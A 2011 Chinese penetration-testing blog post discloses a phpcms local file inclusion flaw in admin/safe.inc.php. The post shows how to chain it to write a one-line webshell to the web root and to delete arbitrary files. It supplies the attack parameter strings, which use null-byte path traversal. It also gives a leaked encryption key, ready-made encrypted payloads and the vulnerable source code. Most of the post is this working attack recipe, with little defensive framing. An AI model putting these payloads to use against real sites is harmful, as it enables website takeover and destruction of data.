phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞-oma-ChinaUnix博客

渗透

首页　| 　博文目录　| 　关于我

oma

博客访问： 2253830
博文数量： 181
博客积分： 9990
博客等级：中将
技术积分： 1865
用户组：普通用户
注册时间： 2006-05-23 09:43

文章分类

全部博文（181）

cms（2）

phpcms（2）
好友专区（1）
oracle专题（2）
windows（5）
渗透技巧总结（34）

linux（4）
渗透工具（25）
webshell（2）
asp专题（36）
aspx专题（2）
php专题（41）
免杀专题（1）
提权相关（2）
asp木马（1）
休闲心情（10）
其它（17）
未分配的博文（0）

文章存档

2011年（40）

2010年（17）

2009年（87）

2008年（37）

我的朋友

相关博文

phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

分类：网络与安全

2011-04-06 21:49:14

这年头发个bug伤不起啊，厂商忽略，被人当成装X，有木有，心情不爽啊不管这么多了。

phpcms本地包含拿shell的方法，这篇文章接上一个

《phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞》

phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制，导致能拿shell的方法很多，类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序，但是很可惜的是虽然文件名叫做safe，但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话
用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’;
加密如下字符串
$evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=&mod=../../admin/safe.inc.php%00′;

gNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马

同理任意文件删除漏洞：
$evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;

DwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

贴上存在漏洞的代码
//admin/safe.inc.php
defined(‘IN_PHPCMS’) or exit(‘Access Denied’);
// include/common.inc.php 里面声明了常量
// define(‘IN_PHPCMS’, TRUE);

if(empty($action)) $action = “start”;
$safe = cache_read(‘safe.php’);
$filecheck = load(‘filecheck.class.php’);
if(empty($safe))
{
$safe = array (
‘file_type’ => ‘php|js’,
‘code’ => ”,
‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’,
‘dir’ => $filecheck->checked_dirs()
);
}
switch ($action)
{
…
case ‘edit_code’:
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage(‘修改成功！’);
}
break;

case ‘del_file’:
$file_path = urldecode($files);

if (empty($file_path))
{
showmessage(‘请选择文件’);
}
$file_list = cache_read(‘scan_backdoor.php’);
unset($file_list[$file_path]);
cache_write(‘scan_backdoor.php’,$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage(‘文件删除成功！’, ‘?mod=phpcms&file=safe&action=scan_table’);
break;
…

阅读(1287) | 评论(0) | 转发(0) |

上一篇：电大在线在线远程教学平台0DAY（全国电大通吃)

下一篇：phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6